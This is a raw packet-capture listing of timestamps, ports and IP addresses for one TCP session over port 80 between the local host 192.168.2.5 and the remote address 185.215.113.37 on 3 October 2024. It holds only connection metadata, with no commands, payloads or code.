Oct 3, 2024 21:36:07.105938911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105948925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.105961084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.105978012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.106803894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106812954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106821060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106829882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106839895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106846094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.106854916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106865883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106873989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.106882095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106890917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.106899977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.106919050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.107744932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.107754946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.107764006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.107773066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.107781887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.107788086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.107798100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.107805014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.107814074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.107831955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.107861996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.108681917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108691931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108700037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108710051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108721018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108726025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.108736992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108741999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.108750105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108760118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.108767986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.108782053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.108807087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.109561920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109570980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109579086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109589100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109596968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109603882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.109612942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109622002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109635115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.109642029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.109658957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.109668970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.110498905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110508919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110517025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110526085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110534906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110541105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.110549927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110565901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110573053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.110580921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.110586882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.110630035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.111346960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.111356974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.111365080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.111397982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.111407042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147181988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147232056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147310019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147321939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147347927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147363901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147459984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147470951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147480965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147490978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147511005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147521019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147543907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147885084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147893906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147903919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147914886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147926092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.147934914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.147973061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.148339033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148384094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.148487091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148498058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148508072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148518085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148529053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.148535967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148546934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148556948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.148562908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.148590088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.149221897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149233103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149243116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149252892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149264097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149271011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.149281025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149291992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149301052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.149307013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.149323940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.149342060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.150075912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150087118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150096893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150108099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150115013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.150124073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150132895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.150166035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.150574923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150583982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150594950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150604963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150614977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150621891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.150629997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150640965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150648117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.150656939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.150672913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.150743961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.151458979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.151469946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.151479006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.151490927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.151499987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.151514053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.151552916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.190707922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.190761089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.190781116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.190788984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.190809965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.190829039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.190942049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.190957069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.190968037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.190979004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.190985918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191000938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191034079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191349983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191404104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191478968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191488981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191498995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191509008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191515923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191549063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191930056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191941023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191951036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191962004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191972017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191979885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.191987038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.191996098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192013025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.192028999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.192588091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192598104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192608118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192617893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192629099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192636967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.192645073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192656994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.192663908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.192678928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.192713976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.193304062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193315029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193325043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193335056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193345070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.193352938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193367004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.193399906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.193866968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193876982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193886995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193897009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193907022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193916082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.193922997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193933010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.193939924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.193963051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.193983078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.194706917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.194716930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.194726944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.194737911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.194747925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.194753885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.194763899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.194775105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.194781065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.194811106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.195596933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195606947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195616961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195628881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195637941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195645094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.195655107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195662022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.195669889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195676088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.195686102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195696115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.195703030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.195733070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.196537018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196547031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196557045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196567059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196577072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196585894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.196594000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196604967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196614981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.196650028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.196820021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.197444916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197455883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197465897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197475910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197485924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197494030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.197504997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197515011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197523117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.197534084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.197544098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.197560072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.197599888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.198110104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.198121071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.198132038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.198157072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.198183060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.233922958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.233933926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.233944893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234019995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.234206915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234222889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234232903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234245062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234253883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.234287024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.234395027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234443903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.234452009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234463930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234473944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234489918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.234519958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.234786034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234833956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.234955072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234965086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234977007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234987020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.234997034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.235003948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.235014915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.235023975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.235059023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.235069036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.235570908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.235582113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:07.235624075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.653165102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:07.658066988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:08.387473106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:08.387656927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:08.526830912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:08.531738997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:09.243246078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:09.243798971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:09.689912081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:09.694906950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:10.404055119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:10.404124975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:10.902854919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:10.907959938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.162844896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.162903070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.162934065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.162966967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163003922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163022995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163037062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163043976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163059950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163068056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163086891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163103104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163132906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163145065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163167000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163181067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163228035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163242102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163255930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163276911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163302898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.163486958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163510084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.163558960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.292126894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.292157888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.292174101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.292186975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.292207956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.292222023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:11.292231083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:11.292243004 CEST	80	49704	185.215.113.37	192.168.2.5
